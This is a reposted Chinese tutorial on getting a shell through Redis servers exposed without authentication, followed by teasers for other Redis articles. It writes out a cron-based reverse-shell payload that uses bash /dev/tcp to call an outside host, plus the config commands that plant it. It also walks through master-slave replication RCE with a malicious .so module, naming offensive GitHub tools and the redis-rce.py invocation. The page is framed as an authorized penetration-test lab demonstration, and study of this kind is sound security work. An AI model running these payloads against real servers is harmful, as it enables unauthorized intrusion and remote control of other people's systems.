Redis+Getshell的示例分析-Redis-PHP中文网

首页

数据库

Redis

Redis+Getshell的示例分析

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

May 27, 2023 pm 08:43 PM

redisgetshell

前言：

通常情况下，当进行授权渗透测试时，即使尝试了传统漏洞攻击（如注入、文件上传等），却无法获得任何信息时，扫描端口还是可能会带来意料之外的收获。

知己知彼乃百战不殆，Redis介绍：

简单来说 redis 就是一个Key-Value类型的数据库， redis 所有数据全部在内存中进行操作，并且它可以将内存中的数据定期存储在磁盘中，并且支持保存多种数据结构(String、hash、list等)。

运筹帷幄之中，Redis漏洞：

1、未授权访问漏洞

Redis在默认情况下，会绑定在0.0.0.0:6379，如果没有采用限制IP访问，就会将Redis服务暴露在公网上，并且在没有设置密码认证的情况下，会导致任意用户未授权访问Redis以及读取Redis数据并写入公钥进行远程连接等。

当拿到数据库权限是不会满足我们的，我们的目标只有一个getshell！

目前较主流的两个方法，第一种定时计划反弹shell、第二种利用主从复制rce。

2、定时计划反弹shell

1）set x "\n* * * * * bash -i >& /dev/tcp/1.1.1.1/888 0>&1\n"

2）config set dir /var/spool/cron/

3）config set dbfilename root

4）save

3、利用主从复制rce

漏洞存在于4.x、5.x版本中，Redis提供了主从模式，主从模式指使用一个redis作为主机，其他的作为备份机，主机从机数据都是一样的，从机只负责读，主机只负责写。在Reids 4.x之后，通过外部拓展，可以实现在redis中实现一个新的Redis命令，构造恶意.so文件。在两个Redis实例设置主从模式的时候，Redis的主机实例可以通过FULLRESYNC同步文件到从机上。然后在从机上加载恶意so文件，即可执行命令。

需要利用一个工具，GitHub下载即可。

1）git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand（需要make）

2）git clone https://github.com/Ridter/redis-rce.git

进而通过未授权访问或者弱口令连接redis，执行脚本即可获取shell。
Redis+Getshell的示例分析

决胜千里之外，实战演练：

本次扫到了6379也就是Redis，有的时候可能或改默认端口，建议全端口扫描,本次利用主从复制rce获取shell(由于该漏洞已提交src，签约保密协议，故搭建靶机还原真实环境，保证原汁原味。)

攻击端ip：192.168.109.134

服务端ip：192.168.109.136

Redis+Getshell的示例分析通过未授权访问连接redis（如果有密码，可以尝试爆破，authpassword 登陆系统）：Redis-cli –h ip
利用主从复制rce获取shell

首先要生成恶意.so文件，下载RedisModules-ExecuteCommand使用make编译即可生成。
Redis+Getshell的示例分析攻击端执行：

python redis-rce.py -r 目标ip-p 目标端口 -L 本地ip -f 恶意.so

成功获取shell
Redis+Getshell的示例分析

以上是Redis+Getshell的示例分析的详细内容。更多信息请关注PHP中文网其他相关文章！

声明

本文转载于：亿速云。如有侵权，请联系admin@php.cn删除

了解NOSQL：Redis的关键特征Apr 13, 2025 am 12:17 AM

Redis的关键特性包括速度、灵活性和丰富的数据结构支持。1）速度：Redis作为内存数据库，读写操作几乎瞬时，适用于缓存和会话管理。2）灵活性：支持多种数据结构，如字符串、列表、集合等，适用于复杂数据处理。3）数据结构支持：提供字符串、列表、集合、哈希表等，适合不同业务需求。

REDIS：确定其主要功能Apr 12, 2025 am 12:01 AM

Redis的核心功能是高性能的内存数据存储和处理系统。1)高速数据访问：Redis将数据存储在内存中，提供微秒级别的读写速度。2)丰富的数据结构：支持字符串、列表、集合等，适应多种应用场景。3)持久化：通过RDB和AOF方式将数据持久化到磁盘。4)发布订阅：可用于消息队列或实时通信系统。

REDIS：流行数据结构指南Apr 11, 2025 am 12:04 AM

Redis支持多种数据结构，具体包括：1.字符串（String），适合存储单一值数据；2.列表（List），适用于队列和栈；3.集合（Set），用于存储不重复数据；4.有序集合（SortedSet），适用于排行榜和优先级队列；5.哈希表（Hash），适合存储对象或结构化数据。

redis计数器怎么实现Apr 10, 2025 pm 10:21 PM

Redis计数器是一种使用Redis键值对存储来实现计数操作的机制，包含以下步骤：创建计数器键、增加计数、减少计数、重置计数和获取计数。Redis计数器的优势包括速度快、高并发、持久性和简单易用。它可用于用户访问计数、实时指标跟踪、游戏分数和排名以及订单处理计数等场景。

redis命令行怎么用Apr 10, 2025 pm 10:18 PM

使用 Redis 命令行工具 (redis-cli) 可通过以下步骤管理和操作 Redis：连接到服务器，指定地址和端口。使用命令名称和参数向服务器发送命令。使用 HELP 命令查看特定命令的帮助信息。使用 QUIT 命令退出命令行工具。

redis集群模式怎么搭建Apr 10, 2025 pm 10:15 PM

Redis集群模式通过分片将Redis实例部署到多个服务器，提高可扩展性和可用性。搭建步骤如下：创建奇数个Redis实例，端口不同；创建3个sentinel实例，监控Redis实例并进行故障转移；配置sentinel配置文件，添加监控Redis实例信息和故障转移设置；配置Redis实例配置文件，启用集群模式并指定集群信息文件路径；创建nodes.conf文件，包含各Redis实例的信息；启动集群，执行create命令创建集群并指定副本数量；登录集群执行CLUSTER INFO命令验证集群状态；使

redis怎么读取队列Apr 10, 2025 pm 10:12 PM

要从 Redis 读取队列，需要获取队列名称、使用 LPOP 命令读取元素，并处理空队列。具体步骤如下：获取队列名称：以 "queue:" 前缀命名，如 "queue:my-queue"。使用 LPOP 命令：从队列头部弹出元素并返回其值，如 LPOP queue:my-queue。处理空队列：如果队列为空，LPOP 返回 nil，可先检查队列是否存在再读取元素。

redis集群zset怎么使用Apr 10, 2025 pm 10:09 PM

Redis 集群中使用 zset：zset 是一种有序集合，将元素与评分关联。分片策略： a. 哈希分片：根据 zset 键的哈希值分布。 b. 范围分片：根据元素评分划分为范围，并将每个范围分配给不同的节点。读写操作： a. 读操作：如果 zset 键属于当前节点的分片，则在本地处理；否则，路由到相应的分片。 b. 写入操作：始终路由到持有 zset 键的分片。

See all articles